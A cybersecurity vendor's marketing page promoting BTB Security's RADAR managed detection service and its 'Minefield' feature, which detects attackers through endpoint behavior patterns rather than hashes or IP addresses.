We offer detective, proactive, and reactive cyber security services to clients from all industries.View All
We strive to develop a true relationship with each customer.Learn More
Our managed detection and response (MDR) service built on a platform that helps quickly identify and eliminate security threats.Learn More
Detect vulnerabilities before they become threats.Learn More
Align your IT efforts with the goals of your business.Learn More
Detect and Defeat security threats in record time with our expert team.Learn More
Recruit our team to advise on information security planning.Learn more
Our team delivers exceptional service through honesty and accountability.Learn More
Our services meet requirements for many common regulations and standards.Learn More
Behavior-based detection with over 250 unique process behaviors to keep your business safe.Learn More
An intelligence feed to tag and funnel internet traffic into manageable patterns.Learn More
We integrate with over 100 of the most common and powerful tools to ensure threats are identified and eliminated.Learn More
The foundation for our services: a team dedicated to Research, Intelligence, and Offensive Tactics.Learn More
Designed to identify adversaries on endpoints, it is a series of behavioral indicator “traps” set along various phases of an attack.
By creating various behavior indicator patterns on endpoint operating systems, Minefield serves as a warning system for potential anomalies triggered by adversaries or compromised accounts by interacting with operating systems or software on the endpoints. Minefield not only incorporates current tactics and techniques from the MITRE ATT&CK framework, but it also focuses on core operating system and 3rd party software patterns to pinpoint potential malicious behavior patterns.
Minefield covers a wide variety of core operating system processes, including but not limited to popular built-in binaries, commonly referred to as LotL (Living off the Land) binaries and development tools leveraged in BYOL (Build Your Own Land) tactics. Minefield does not leverage traditional IOCs such as hash values and IP addresses, instead, it relies on behavior patterns of users and processes on the endpoints. This approach was selected because traditional IOCs are too easy to modify unlike tactics and techniques used by adversaries. Think how easy it is to change a hash value of a file by simply recompiling it but something like lateral movement always relies on predetermined processes and protocols that cannot be easily avoided or substituted. This approach has proven to be successful against modern adversaries and resulted in what is currently 500+ behavioral patterns for the endpoints. This number continues to grow as new attack vectors and operating system features are introduced and assessed.
Many traditional monitoring techniques heavily rely on the identification and creation of Indicators of Compromise (IoCs) that the tool/solution/MSSP then "look for" within the data they collect and evaluate. These IoCs often include very specific data-elements that can be easily defeated (i.e., bad guys can evade detection) by slightly changing their contents. For example, the hash value of a malicious executable, or target URL. Minefield expands upon RADAR’s existent behavior-based detection techniques and considers over 500 unique endpoint behavior patterns that encompass tools, techniques, and procedures associated with the ATT&CK framework, Living off the Land (LOLBins and GTFOBins) projects, and 20 years of BTB Security red teaming and evasion experience.
IoCs have a place in security monitoring, including RADAR, but Minefield dramatically changes the how BTB Security detects threats, adding resolution and confidence to identified malicious behaviors. Minefield ensures we deliver better outcomes for RADAR clients.
BTB Security's RADAR continually evolves to stay ahead of the adversaries. Having been designed, developed, and built by Information Security practitioners, RADAR has always considered HOW an adversary behaves. Minefield expands upon this approach to define key behavioral patterns on endpoints along the attack trajectory and notifies BTB Threat Operations to enable an effective response process.
Minefield is proprietary to BTB Security, having been developed 100% in-house by our RIOT Labs group. It's data. It's experience. It's expertise. We hack, we defend, we learn.
As a BTB Security RADAR customer, you're already protected. There's nothing to do, nothing to configure, nothing to install.